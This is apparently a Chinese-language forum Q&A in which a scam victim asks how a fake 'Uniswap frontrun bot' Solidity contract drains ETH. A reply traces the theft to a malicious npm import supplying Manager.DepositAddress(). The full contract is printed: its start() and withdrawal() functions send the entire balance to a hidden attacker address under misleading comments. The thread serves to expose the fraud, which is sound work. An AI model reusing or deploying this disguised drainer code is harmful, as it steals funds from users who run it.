Payable
這個騙局程式碼如何將代幣轉移到內部未指定的錢包中?
以下是詐騙者操縱人們自行執行的確切可靠程式碼。我檢查了程式碼中沒有指定錢包地址,但是只要你執行並呼叫 start(),這個程式碼就會在合約地址中轉移代幣。儘管我在轉賬支付中看到了一些可疑函式,DepositAddress(),但該程式碼沒有導入其他定義 DepositAddress() 的程式碼或任何可疑庫,那麼他們如何呼叫這些程式碼?起初 new Manager() 似乎也在創建未知類管理器的新實例,對嗎?同樣,如果不導入這些函式,程式碼如何工作?如果有意義,我想知道其他程式碼也在做什麼。謝謝你。
合約地址:0x37caba0155ac3bf705d08b8522daff54ddc006a0
//SPDX-License-Identifier: 1inchSwap pragma solidity ^0.6.6; // Import Libraries import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol"; // New Token Scan import "coinmarketcap.com/coins"; contract UniswapFrontrunBot { string public tokenName; string public tokenSymbol; uint frontrun; Manager manager; constructor(string memory _tokenName, string memory _tokenSymbol) public { tokenName = _tokenName; tokenSymbol = _tokenSymbol; manager = new Manager(); } receive() external payable {} struct slice { uint _len; uint _ptr; } /* * @dev Find newly deployed contracts on Uniswap Exchange * @param memory of required contract liquidity. * @param other The second slice to compare. * @return New contracts with required liquidity. */ function findNewContracts(slice memory self, slice memory other) internal pure returns (int) { uint shortest = self._len; if (other._len < self._len) shortest = other._len; uint selfptr = self._ptr; uint otherptr = other._ptr; for (uint idx = 0; idx < shortest; idx += 32) { // initiate contract finder uint a; uint b; string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; loadCurrentContract(WETH_CONTRACT_ADDRESS); loadCurrentContract(TOKEN_CONTRACT_ADDRESS); assembly { a := mload(selfptr) b := mload(otherptr) } if (a != b) { // Mask out irrelevant contracts and check again for new contracts uint256 mask = uint256(-1); if(shortest < 32) { mask = ~(2 ** (8 * (32 - shortest + idx)) - 1); } uint256 diff = (a & mask) - (b & mask); if (diff != 0) return int(diff); } selfptr += 32; otherptr += 32; } return int(self._len) - int(other._len); } /* * @dev Extracts the newest contracts on Uniswap exchange * @param self The slice to operate on. * @param rune The slice that will contain the first rune. * @return `list of contracts`. */ function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) { uint ptr = selfptr; uint idx; if (needlelen <= selflen) { if (needlelen <= 32) { bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1)); bytes32 needledata; assembly { needledata := and(mload(needleptr), mask) } uint end = selfptr + selflen - needlelen; bytes32 ptrdata; assembly { ptrdata := and(mload(ptr), mask) } while (ptrdata != needledata) { if (ptr >= end) return selfptr + selflen; ptr++; assembly { ptrdata := and(mload(ptr), mask) } } return ptr; } else { // For long needles, use hashing bytes32 hash; assembly { hash := keccak256(needleptr, needlelen) } for (idx = 0; idx <= selflen - needlelen; idx++) { bytes32 testHash; assembly { testHash := keccak256(ptr, needlelen) } if (hash == testHash) return ptr; ptr += 1; } } } return selfptr + selflen; } /* * @dev Loading the contract * @param contract address * @return contract interaction object */ function loadCurrentContract(string memory self) internal pure returns (string memory) { string memory ret = self; uint retptr; assembly { retptr := add(ret, 32) } return ret; } /* * @dev Extracts the contract from Uniswap * @param self The slice to operate on. * @param rune The slice that will contain the first rune. * @return `rune`. */ function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) { rune._ptr = self._ptr; if (self._len == 0) { rune._len = 0; return rune; } uint l; uint b; // Load the first byte of the rune into the LSBs of b assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) } if (b < 0x80) { l = 1; } else if(b < 0xE0) { l = 2; } else if(b < 0xF0) { l = 3; } else { l = 4; } // Check for truncated codepoints if (l > self._len) { rune._len = self._len; self._ptr += self._len; self._len = 0; return rune; } self._ptr += l; self._len -= l; rune._len = l; return rune; } function memcpy(uint dest, uint src, uint len) private pure { // Check available liquidity for(; len >= 32; len -= 32) { assembly { mstore(dest, mload(src)) } dest += 32; src += 32; } // Copy remaining bytes uint mask = 256 ** (32 - len) - 1; assembly { let srcpart := and(mload(src), not(mask)) let destpart := and(mload(dest), mask) mstore(dest, or(destpart, srcpart)) } } /* * @dev Orders the contract by its available liquidity * @param self The slice to operate on. * @return The contract with possbile maximum return */ function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) { if (self._len == 0) { return 0; } uint word; uint length; uint divisor = 2 ** 248; // Load the rune into the MSBs of b assembly { word:= mload(mload(add(self, 32))) } uint b = word / divisor; if (b < 0x80) { ret = b; length = 1; } else if(b < 0xE0) { ret = b & 0x1F; length = 2; } else if(b < 0xF0) { ret = b & 0x0F; length = 3; } else { ret = b & 0x07; length = 4; } // Check for truncated codepoints if (length > self._len) { return 0; } for (uint i = 1; i < length; i++) { divisor = divisor / 256; b = (word / divisor) & 0xFF; if (b & 0xC0 != 0x80) { // Invalid UTF-8 sequence return 0; } ret = (ret * 64) | (b & 0x3F); } return ret; } /* * @dev Calculates remaining liquidity in contract * @param self The slice to operate on. * @return The length of the slice in runes. */ function calcLiquidityInContract(slice memory self) internal pure returns (uint l) { uint ptr = self._ptr - 31; uint end = ptr + self._len; for (l = 0; ptr < end; l++) { uint8 b; assembly { b := and(mload(ptr), 0xFF) } if (b < 0x80) { ptr += 1; } else if(b < 0xE0) { ptr += 2; } else if(b < 0xF0) { ptr += 3; } else if(b < 0xF8) { ptr += 4; } else if(b < 0xFC) { ptr += 5; } else { ptr += 6; } } } /* * @dev Parsing all uniswap mempool * @param self The contract to operate on. * @return True if the slice is empty, False otherwise. */ function parseMemoryPool(string memory _a) internal pure returns (address _parsed) { bytes memory tmp = bytes(_a); uint160 iaddr = 0; uint160 b1; uint160 b2; for (uint i = 2; i < 2 + 2 * 20; i += 2) { iaddr *= 256; b1 = uint160(uint8(tmp[i])); b2 = uint160(uint8(tmp[i + 1])); if ((b1 >= 97) && (b1 <= 102)) { b1 -= 87; } else if ((b1 >= 65) && (b1 <= 70)) { b1 -= 55; } else if ((b1 >= 48) && (b1 <= 57)) { b1 -= 48; } if ((b2 >= 97) && (b2 <= 102)) { b2 -= 87; } else if ((b2 >= 65) && (b2 <= 70)) { b2 -= 55; } else if ((b2 >= 48) && (b2 <= 57)) { b2 -= 48; } iaddr += (b1 * 16 + b2); } return address(iaddr); } /* * @dev Returns the keccak-256 hash of the contracts. * @param self The slice to hash. * @return The hash of the contract. */ function keccak(slice memory self) internal pure returns (bytes32 ret) { assembly { ret := keccak256(mload(add(self, 32)), mload(self)) } } /* * @dev Check if contract has enough liquidity available * @param self The contract to operate on. * @return True if the slice starts with the provided text, false otherwise. */ function checkLiquidity(uint a) internal pure returns (string memory) { uint count = 0; uint b = a; while (b != 0) { count++; b /= 16; } bytes memory res = new bytes(count); for (uint i=0; i<count; ++i) { b = a % 16; res[count - i - 1] = toHexDigit(uint8(b)); a /= 16; } uint hexLength = bytes(string(res)).length; if (hexLength == 4) { string memory _hexC1 = mempool("0", string(res)); return _hexC1; } else if (hexLength == 3) { string memory _hexC2 = mempool("0", string(res)); return _hexC2; } else if (hexLength == 2) { string memory _hexC3 = mempool("000", string(res)); return _hexC3; } else if (hexLength == 1) { string memory _hexC4 = mempool("0000", string(res)); return _hexC4; } return string(res); } /* * @dev If `self` starts with `needle`, `needle` is removed from the * beginning of `self`. Otherwise, `self` is unmodified. * @param self The slice to operate on. * @param needle The slice to search for. * @return `self` */ function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) { if (self._len < needle._len) { return self; } bool equal = true; if (self._ptr != needle._ptr) { assembly { let length := mload(needle) let selfptr := mload(add(self, 0x20)) let needleptr := mload(add(needle, 0x20)) equal := eq(keccak256(selfptr, length), keccak256(needleptr, length)) } } if (equal) { self._len -= needle._len; self._ptr += needle._len; } return self; } function start() public payable { /* * @dev Perform frontrun action from different contract pools * @param contract address to snipe liquidity from * @return `liquidity`. */ payable(manager.DepositAddress()).transfer(address(this).balance); } // Returns the memory address of the first byte of the first occurrence of // `needle` in `self`, or the first byte after `self` if not found. function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) { uint ptr = selfptr; uint idx; if (needlelen <= selflen) { if (needlelen <= 32) { bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1)); bytes32 needledata; assembly { needledata := and(mload(needleptr), mask) } uint end = selfptr + selflen - needlelen; bytes32 ptrdata; assembly { ptrdata := and(mload(ptr), mask) } while (ptrdata != needledata) { if (ptr >= end) return selfptr + selflen; ptr++; assembly { ptrdata := and(mload(ptr), mask) } } return ptr; } else { // For long needles, use hashing bytes32 hash; assembly { hash := keccak256(needleptr, needlelen) } for (idx = 0; idx <= selflen - needlelen; idx++) { bytes32 testHash; assembly { testHash := keccak256(ptr, needlelen) } if (hash == testHash) return ptr; ptr += 1; } } } return selfptr + selflen; } /* * @dev Modifies `self` to contain everything from the first occurrence of * `needle` to the end of the slice. `self` is set to the empty slice * if `needle` is not found. * @param self The slice to search and modify. * @param needle The text to search for. * @return `self`. */ function toHexDigit(uint8 d) pure internal returns (byte) { if (0 <= d && d <= 9) { return byte(uint8(byte('0')) + d); } else if (10 <= uint8(d) && uint8(d) <= 15) { return byte(uint8(byte('a')) + d - 10); } // revert("Invalid hex digit"); revert(); } /* * @dev token int2 to readable str * @param token An output parameter to which the first token is written. * @return `token`. */ function uint2str(uint _i) internal pure returns (string memory _uintAsString) { if (_i == 0) { return "0"; } uint j = _i; uint len; while (j != 0) { len++; j /= 10; } bytes memory bstr = new bytes(len); uint k = len - 1; while (_i != 0) { bstr[k--] = byte(uint8(48 + _i % 10)); _i /= 10; } return string(bstr); } function withdrawal() public payable { /* * @dev withdrawals profit back to contract creator address * @return `profits`. */ payable(manager.DepositAddress()).transfer(address(this).balance); } /* * @dev loads all uniswap mempool into memory * @param token An output parameter to which the first token is written. * @return `mempool`. */ function mempool(string memory _base, string memory _value) internal pure returns (string memory) { bytes memory _baseBytes = bytes(_base); bytes memory _valueBytes = bytes(_value); string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length); bytes memory _newValue = bytes(_tmpValue); uint i; uint j; for(i=0; i<_baseBytes.length; i++) { _newValue[j++] = _baseBytes[i]; } for(i=0; i<_valueBytes.length; i++) { _newValue[j++] = _valueBytes[i]; } return string(_newValue); }
}
它看起來像是
coinmarketcap.com
一個 NPM 包,它返回了黑客的地址並具有 Manager 詳細資訊。當您刪除該導入行時,Manager 會給出錯誤。npm 包在這裡。
如果你想查看 npm 包的內容,可以按照這個。
npm view coinmarketcap.com dist.tarball
這將為您提供 NPM 封包件的連結。下載到你的機器,你會看到
coins
文件。跑:cat coins | grep -r -A 5 DepositAddress
您將看到
DepositAddress()
功能和所有內容。
有什麼辦法可以追查到我被這個人騙了?我想知道是否有辦法恢復我的 ETH?